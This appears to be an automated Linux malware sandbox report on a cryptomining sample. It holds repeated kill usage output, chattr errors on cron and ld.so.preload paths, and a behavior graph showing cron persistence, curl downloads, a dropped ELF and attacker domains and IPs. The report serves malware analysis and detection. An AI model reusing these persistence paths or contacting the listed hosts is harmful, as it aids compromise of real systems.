-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).
/tmp/pcXrXrdEB2: line 121: rep: command not found
grep: write error

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).
chattr: No such file or directory while trying to stat /usr/local/bin/dns
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/ld.so.preload

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 784804 Sample: pcXrXrdEB2 Startdate: 11/02/2019 Architecture: LINUX Score: 64 61 drnfbu.xyz 198.35.45.242, 26750, 55998 IT7NET-IT7NetworksIncCA Canada 2->61 63 104.27.166.54, 42556, 80 CLOUDFLARENET-CloudFlareIncUS United States 2->63 65 yxarsh.shop 104.27.167.54, 48248, 48250, 48252 CLOUDFLARENET-CloudFlareIncUS United States 2->65 69 Antivirus detection for dropped file 2->69 71 Found strings related to Crypto-Mining 2->71 8 bash 2->8         started        12 systemd polkitd 2->12         started        signatures3 73 Detected TCP or UDP traffic on non-standard ports 61->73 process4 file5 47 /etc/crontab, ASCII 8->47 dropped 49 /etc/cron.d/root, ASCII 8->49 dropped 51 /etc/cron.d/apache, ASCII 8->51 dropped 75 Sample tries to persist itself using cron 8->75 14 bash 8->14         started        16 bash 8->16         started        18 bash 8->18         started        26 297 other processes 8->26 20 polkitd pkla-check-authorization 12->20         started        22 polkitd pkla-check-authorization 12->22         started        24 polkitd pkla-check-authorization 12->24         started        29 49 other processes 12->29 signatures6 process7 signatures8 31 bash curl 14->31         started        35 bash curl 16->35         started        37 bash curl 18->37         started        77 Executes the "rm" command used to delete files or directories 26->77 39 bash curl 26->39         started        41 xargs kill 26->41         started        43 xargs kill 26->43         started        45 35 other processes 26->45 process9 file10 53 /etc/cron.hourly/oanacroner, ASCII 31->53 dropped 67 Sample tries to persist itself using cron 31->67 55 /etc/cron.daily/oanacroner, ASCII 35->55 dropped 57 /etc/cron.monthly/oanacroner, ASCII 37->57 dropped 59 /tmp/r1x, ELF 39->59 dropped signatures11

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.